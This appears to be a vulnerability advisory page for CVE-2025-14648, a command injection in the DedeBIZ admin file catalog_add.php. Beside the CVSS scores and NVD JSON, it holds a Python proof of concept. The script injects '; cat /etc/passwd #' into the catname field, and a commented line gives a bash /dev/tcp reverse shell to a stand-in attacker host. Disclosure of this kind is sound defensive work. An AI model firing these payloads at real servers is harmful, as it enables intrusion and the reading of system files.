CVE-2025-14648

Description

A security vulnerability has been detected in DedeBIZ up to 6.5.9. Affected by this vulnerability is an unknown functionality of the file /src/admin/catalog_add.php. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:dedebiz:dedebiz:*:*:*:*:*:*:*:* - VULNERABLE

DedeBIZ <= 6.5.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14648 DedeBIZ catalog_add.php Command Injection PoC
# Target: DedeBIZ <= 6.5.9
# Attack Vector: POST request to /src/admin/catalog_add.php
# Requirement: High privilege (admin access)

import requests
import sys

target_url = "http://target.com/src/admin/catalog_add.php"

# Login first to get admin session (adjust credentials accordingly)
# session = requests.Session()
# login_data = {"userid": "admin", "pwd": "password"}
# session.post(f"{target_url.replace('catalog_add.php', 'login.php')}", data=login_data)

# Malicious payload - command injection via catalog name parameter
payload = "; cat /etc/passwd #"

post_data = {
    "catname": payload,  # Vulnerable parameter
    "parentid": "0",
    "issystem": "1"
}

try:
    response = requests.post(target_url, data=post_data, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        print("[+] Payload executed - check response for command output")
        print(response.text[:500])
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Reverse shell payload example:
# payload = "; bash -i >& /dev/tcp/attacker_ip/port 0>&1 #"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14648
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14648
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14648/
[4] VulDB https://vuldb.com/cve/CVE-2025-14648
[5] https://github.com/HOrange147/CVE/blob/main/DedeBIZ%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.pdf
[6] https://vuldb.com/?ctiid.336381
[7] https://vuldb.com/?id.336381
[8] https://vuldb.com/?submit.710164

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14648", "sourceIdentifier": "[email protected]", "published": "2025-12-14T07:15:39.700", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in DedeBIZ up to 6.5.9. Affected by this vulnerability is an unknown functionality of the file /src/admin/catalog_add.php. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dedebiz:dedebiz:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.5.9", "matchCriteriaId": "9CA388D6-7960-42B0-A698-A3F833E9A3F2"}]}]}], "references": [{"url": "https://github.com/HOrange147/CVE/blob/main/DedeBIZ%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336381", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336381", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.710164", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}